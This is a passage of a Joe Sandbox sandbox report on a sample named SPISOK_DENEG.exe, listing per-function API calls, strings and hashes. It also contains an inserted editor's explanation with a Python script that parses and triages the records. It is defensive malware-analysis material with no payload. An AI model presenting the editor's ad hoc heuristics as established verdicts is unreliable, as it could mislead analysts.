                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 000F31FB
                                                            • _abort.LIBCMT ref: 000F3306
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: a1b91c2dfeb1fc6ae3340ae8c8f7f1d9d320fc73e4d8824727a654228fdbf97e
                                                            • Instruction ID: a782a20e7c823a8a8f69246beb624b6bd00b22459a976249aab400e0d49dba32
                                                            • Opcode Fuzzy Hash: a1b91c2dfeb1fc6ae3340ae8c8f7f1d9d320fc73e4d8824727a654228fdbf97e
                                                            • Instruction Fuzzy Hash: AB41487190020DAFCF55DF98CD81AEEBBB5BF48314F198059FA04A7612D735AA90EB50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D7406
                                                              • Part of subcall function 000D3BBA: __EH_prolog.LIBCMT ref: 000D3BBF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 000D74CD
                                                              • Part of subcall function 000D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000D7AAB
                                                              • Part of subcall function 000D7A9C: GetLastError.KERNEL32 ref: 000D7AF1
                                                              • Part of subcall function 000D7A9C: CloseHandle.KERNEL32(?), ref: 000D7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            • Opcode ID: a5023aa32c29673f50a70cbfc53fb5a2a657721e96573070fc106e1a829d5721
                                                            • Instruction ID: 7258037359d56cc2b002b83861cfef49d77ad4c4cf8512e1dbc60b2fc3c72a69
                                                            • Opcode Fuzzy Hash: a5023aa32c29673f50a70cbfc53fb5a2a657721e96573070fc106e1a829d5721
                                                            • Instruction Fuzzy Hash: 3531A171E04348AADF51EBA4DC45BEEBBA9AF49300F044017F549A7386E7B48A84CB71
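Every function record in this section has the same shape: an "APIs" list (with "Part of subcall function" lines for callees), a "Similarity" block whose "API ID" and "String ID" fields are `$`-separated token lists, an "API String ID" whose second half is `0` when the function references no strings, and an "Instruction Fuzzy Hash". Reading hundreds of these by eye is slow, so the following is an added example (editor's code, not part of the Joe Sandbox report) that parses records of this shape and applies two triage rules: surface functions whose strings name token privileges, such as the record above with SeRestorePrivilege and SeSecurityPrivilege next to GetCurrentProcess and CloseHandle, and functions that resolve their own image path via GetModuleFileNameA, while marking CRT-only records as low priority. The sample text is constructed from records on this page; the triage rules and the "low priority" label are the editor's assumptions, not Joe Sandbox verdicts.

```python
"""Parse Joe Sandbox per-function 'APIs / Similarity' records and triage them.
Added example; the SAMPLE below is constructed from records on this page and
the triage heuristics are the editor's own, not Joe Sandbox output."""
import re
from dataclasses import dataclass, field

# Constructed from three records on this page (Memory Dump Source lines omitted).
SAMPLE = """\
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\\Users\\user\\Desktop\\SPISOK_DENEG.exe,00000104), ref: 000F7FAE
• _free.LIBCMT ref: 000F8079
Strings
Similarity
• API ID: _free$FileModuleName
• String ID: C:\\Users\\user\\Desktop\\SPISOK_DENEG.exe
• API String ID: 2506810119-65320021
• Instruction Fuzzy Hash: 0E31A0B1A0021DAFDB61EF95DC819EEBBFCEF85310F508066FA0497611DB708A84EB51
APIs
• __EH_prolog.LIBCMT ref: 000D7406
• GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 000D74CD
  • Part of subcall function 000D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000D7AAB
  • Part of subcall function 000D7A9C: CloseHandle.KERNEL32(?), ref: 000D7B00
Strings
Similarity
• API ID: ErrorH_prologLast$CloseCurrentHandleProcess
• String ID: SeRestorePrivilege$SeSecurityPrivilege
• API String ID: 3813983858-639343689
• Instruction Fuzzy Hash: 3531A171E04348AADF51EBA4DC45BEEBBA9AF49300F044017F549A7386E7B48A84CB71
APIs
• _free.LIBCMT ref: 000FC817
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Instruction Fuzzy Hash: 38F0623250420CABD764EB69E586CA673E9AF007907584C19F348D7D92CFB0FC81EB50
"""

# "• Name.MODULE(...)" or "• Part of subcall function XXXX: Name.MODULE(...)"
API_LINE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
)
# "• Key: value" lines inside the Similarity block
FIELD_LINE = re.compile(r"^\s*•\s+(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
PRIVILEGE = re.compile(r"^Se\w+Privilege$")
HEADINGS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin"}


@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)   # (name, module, subcall addr or None)
    api_id: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    api_string_id: str = ""
    fuzzy_hash: str = ""


def parse_records(text: str) -> list:
    """Return one FuncRecord per 'APIs' block in the dump."""
    records, cur, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            cur = FuncRecord()
            records.append(cur)
            section = "apis"
        elif stripped == "Similarity":
            section = "sim"
        elif stripped in HEADINGS:
            section = None            # headings whose bullets we do not need
        elif cur is not None and section == "apis":
            m = API_LINE.match(line)
            if m:
                cur.apis.append((m["name"], m["module"], m["sub"]))
        elif cur is not None and section == "sim":
            m = FIELD_LINE.match(line)
            if not m:
                continue
            key, val = m["key"], m["val"].strip()
            if key == "API ID":
                cur.api_id = [t for t in val.split("$") if t]
            elif key == "String ID":
                cur.strings = [t for t in val.split("$") if t]
            elif key == "API String ID":
                cur.api_string_id = val
            elif key == "Instruction Fuzzy Hash":
                cur.fuzzy_hash = val
    return records


def triage(rec: FuncRecord) -> list:
    """Editor's heuristics for which records to open first."""
    reasons = []
    privs = [s for s in rec.strings if PRIVILEGE.match(s)]
    if privs:
        reasons.append("enables token privileges: " + ", ".join(privs))
    if any(name == "GetModuleFileNameA" for name, _, _ in rec.apis):
        reasons.append("resolves its own image path")
    crt_only = rec.apis and all(
        mod == "LIBCMT" or name.startswith("_") for name, mod, _ in rec.apis
    )
    if not reasons and crt_only:
        reasons.append("CRT runtime helper, low priority")
    return reasons


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, rec.fuzzy_hash[:16], rec.api_id, triage(rec))
```

The fuzzy hash is kept on each record so that records from other reports can be grouped on it; the page's "-0" suffix on "API String ID" is consistent with an empty "String ID", which the parser reflects as an empty list rather than a sentinel.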
                                                            APIs
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • EndDialog.USER32(?,00000001), ref: 000EAD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 000EADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 000EADC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            • Opcode ID: f7ae87cc08f0614dd529f388b3d94d34cf4f3ac58c14cea650c5cd6ca8ea3632
                                                            • Instruction ID: fc451227813db2161c177fa9a834acce54327ce38c266e325ce538cefd7a8fb9
                                                            • Opcode Fuzzy Hash: f7ae87cc08f0614dd529f388b3d94d34cf4f3ac58c14cea650c5cd6ca8ea3632
                                                            • Instruction Fuzzy Hash: 3111B132348240BFD3619F69DC05FAA77A9BB4F742F000001F242EA9A1CB61A955D726
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 000DD954
                                                            • _strncpy.LIBCMT ref: 000DD99A
                                                              • Part of subcall function 000E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00111030,00000200,000DD928,00000000,?,00000050,00111030), ref: 000E1DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            • Opcode ID: adee5c02a4176c69eb22ddb1be9d9782c1b6b44c5bbb05905401be45e46b185f
                                                            • Instruction ID: 6bc9ba188231ca44cacaa6d06ac511c6deff3663c43b35c9dc69912a93624fcd
                                                            • Opcode Fuzzy Hash: adee5c02a4176c69eb22ddb1be9d9782c1b6b44c5bbb05905401be45e46b185f
                                                            • Instruction Fuzzy Hash: 1E21727254034CEEDB21EEA4CC05FEEBBE8AF05704F044513FA50962A2E3B2D649DB61
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,000DAC5A,00000008,?,00000000,?,000DD22D,?,00000000), ref: 000E0E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,000DAC5A,00000008,?,00000000,?,000DD22D,?,00000000), ref: 000E0E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,000DAC5A,00000008,?,00000000,?,000DD22D,?,00000000), ref: 000E0E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 000E0EB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            • Opcode ID: 45d5eee93cc1495a5cbf1697b5e198e7a65821f519c23e3be973bdc3d0476299
                                                            • Instruction ID: cb711c140f3b34ab5e5e7ef0e1fc0139c86f2d3738bcbd65dcfca66ce5c484b4
                                                            • Opcode Fuzzy Hash: 45d5eee93cc1495a5cbf1697b5e198e7a65821f519c23e3be973bdc3d0476299
                                                            • Instruction Fuzzy Hash: E31151B16407089FD3315F769C849A7FBECEB69744F14483EF1DAD6301D6B159808B60
                                                            APIs
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • EndDialog.USER32(?,00000001), ref: 000EB2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 000EB2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 000EB304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            • Opcode ID: 6c5cf73b62e0ee9e6bee355a562d88b4f50b86eda716df7199cbfa7e52c26405
                                                            • Instruction ID: 663c9cb9cf80c5bdb8f08a09bd4ff23b98a5c0d51ef5ee07a026c8dbbdbad8a3
                                                            • Opcode Fuzzy Hash: 6c5cf73b62e0ee9e6bee355a562d88b4f50b86eda716df7199cbfa7e52c26405
                                                            • Instruction Fuzzy Hash: 9A110432900259BADB21AE75AD4AFFF37ACEF09700F000025FB46B21C0C7A0DA4087B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 7fd7e979435679324fdf426b9f24fe1bf7dcd47d224f5f719d9dbbe10eb59432
                                                            • Instruction ID: c6676ba19307ad1cc90f9217ab8b76c61f02eae10dbd3b5a23a832e5270305d4
                                                            • Opcode Fuzzy Hash: 7fd7e979435679324fdf426b9f24fe1bf7dcd47d224f5f719d9dbbe10eb59432
                                                            • Instruction Fuzzy Hash: 9C01B575508285AFD7258F9AFD44ADA7BE5F708354B108026F515E3A30CB3188D0DBA0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                            • Instruction ID: 803507f3dc6044358b7b70db5f5662649a62b76441929bc979359ef47f8c34fa
                                                            • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                            • Instruction Fuzzy Hash: C6A16A7290438E9FEB25CF28C8917BEBBE5EF55310F28416DE6859B682C3398D41D790
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,000D7F69,?,?,?), ref: 000DA3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,000D7F69,?), ref: 000DA43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,000D7F69,?,?,?,?,?,?,?), ref: 000DA4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,000D7F69,?,?,?,?,?,?,?,?,?,?), ref: 000DA4C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: e591d5318c2b42326848a7bd5ae8932fdd2a21010635c84bfa72474f08fb2798
                                                            • Instruction ID: 21e6c13a6f04cfc0c316ad08066c9d51a37981c8fe96136c2d7aa8b8cff5cec2
                                                            • Opcode Fuzzy Hash: e591d5318c2b42326848a7bd5ae8932fdd2a21010635c84bfa72474f08fb2798
                                                            • Instruction Fuzzy Hash: 044190312483819AD731DF24DC45FEEBBE9AB86700F04091EB5E1932D1D6B49B48DB63
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: 90415018f5960bc729b78ad33791624f4878325d309edfa484339c5e9e1d1502
                                                            • Instruction ID: 92059de2101601949f3ef40b8f1fcba899086ac793762172ec7e0232517fec32
                                                            • Opcode Fuzzy Hash: 90415018f5960bc729b78ad33791624f4878325d309edfa484339c5e9e1d1502
                                                            • Instruction Fuzzy Hash: 1F41A771A006695FCB25AF688C459EF7BB8EF15310F00001AFD55F7246DF70AE958BA4
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,000F91E0,?,00000000,?,00000001,?,?,00000001,000F91E0,?), ref: 000FC9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000FCA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,000F6CBE,?), ref: 000FCA70
                                                            • __freea.LIBCMT ref: 000FCA79
                                                              • Part of subcall function 000F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,000FCA2C,00000000,?,000F6CBE,?,00000008,?,000F91E0,?,?,?), ref: 000F8E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: d8f8adeff5d00526866bf65bcf0f7d1a0fa81b7d27420714d839d4e9abd09f1a
                                                            • Instruction ID: f5d723cced883b4458d76f94a33035644ae3922ac929e8a6103fd00da8e90dd6
                                                            • Opcode Fuzzy Hash: d8f8adeff5d00526866bf65bcf0f7d1a0fa81b7d27420714d839d4e9abd09f1a
                                                            • Instruction Fuzzy Hash: 9431CD72A0020EABEB24CF64CC46DFE7BA5EF41314B044268FD04E6691EB35DD90EB91
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 000EA666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 000EA675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000EA683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 000EA691
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 5fe2c2669a485137729d76da1a590c8ae2e6fa1c7b09a433d7a1abc33db6464c
                                                            • Instruction ID: 501e14368fda0022e118bd63752abcf3f9673eb160978c3508ef362e5b322275
                                                            • Opcode Fuzzy Hash: 5fe2c2669a485137729d76da1a590c8ae2e6fa1c7b09a433d7a1abc33db6464c
                                                            • Instruction Fuzzy Hash: 41E0C231946731BBC3681B60BC0DBCB3F54AB06B53F008100FA15AA9D0DF7486848FA4
                                                            APIs
                                                              • Part of subcall function 000EA699: GetDC.USER32(00000000), ref: 000EA69D
                                                              • Part of subcall function 000EA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 000EA6A8
                                                              • Part of subcall function 000EA699: ReleaseDC.USER32(00000000,00000000), ref: 000EA6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 000EA83C
                                                              • Part of subcall function 000EAAC9: GetDC.USER32(00000000), ref: 000EAAD2
                                                              • Part of subcall function 000EAAC9: GetObjectW.GDI32(?,00000018,?), ref: 000EAB01
                                                              • Part of subcall function 000EAAC9: ReleaseDC.USER32(00000000,?), ref: 000EAB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: db4a2b37d9de43b7c0d5b8b007705051098ff7ca204658e79ae1b89fa6e67738
                                                            • Instruction ID: 2f2ef0440b7bfb5ed4a12a1deec1cf4074bbf6177dc57b5e253cd6c03f95aa3e
                                                            • Opcode Fuzzy Hash: db4a2b37d9de43b7c0d5b8b007705051098ff7ca204658e79ae1b89fa6e67738
                                                            • Instruction Fuzzy Hash: 7291F071608394AFD721DF25C848A2BBBE9FFC9700F00491EF59AD3260DB71A945CB62
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D75E3
                                                              • Part of subcall function 000E05DA: _wcslen.LIBCMT ref: 000E05E0
                                                              • Part of subcall function 000DA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000DA598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000D777F
                                                              • Part of subcall function 000DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA501
